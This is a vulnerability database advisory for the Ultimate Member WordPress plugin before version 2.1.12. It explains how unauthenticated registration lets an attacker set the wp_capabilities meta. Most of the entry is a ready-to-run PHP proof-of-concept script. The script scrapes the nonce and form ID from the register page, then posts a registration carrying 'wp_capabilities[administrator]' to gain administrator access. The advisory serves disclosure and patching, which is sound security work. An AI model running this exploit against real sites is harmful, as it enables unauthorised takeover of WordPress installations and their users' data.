WordPress Plugin Vulnerabilities
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta
Description
An attacker could supply an array parameter for sensitive meta data such as the wp_capabilities user meta which defines a user’s role. During the registration process, submitted registration details were passed to the update_profile function, and any respective metadata that was submitted, regardless of what was submitted, would be updated for that newly registered user. This simple request would grant administrator access upon registration.
Proof of Concept
<?php // Settings $wp_url = $argv[1]; $username = $argv[2]; $name = $argv[3]; $lastname = $argv[4]; $email = $argv[5]; $um_role = $argv[6]; // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/register'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches); $nonce = $matches[1]; // Pull the form_id $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/register'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match('/id=\"form_id_([^"]+)"/', $content, $matches); $form_id = $matches[1]; // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/register'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'user_login-' . $form_id => $username, 'first_name-'. $form_id => $name, 'last_name-' . $form_id => $lastname, 'user_email-' . $form_id => $email, 'user_password-' . $form_id => 'StrongPassword123!', 'confirm_user_password-' . $form_id => 'StrongPassword123!', 'wp_capabilities[administrator]' => '', 'form_id' => $form_id, 'timestamp' => '1603399250', 'um_request' => '', '_wpnonce' => $nonce, '_wp_http_referer' => 'register' ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
Affects Plugins
References
Classification
Type
PRIVESC
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2020-11-09 (about 3 years ago)
Added
2020-11-09 (about 3 years ago)
Last Updated
2021-01-06 (about 3 years ago)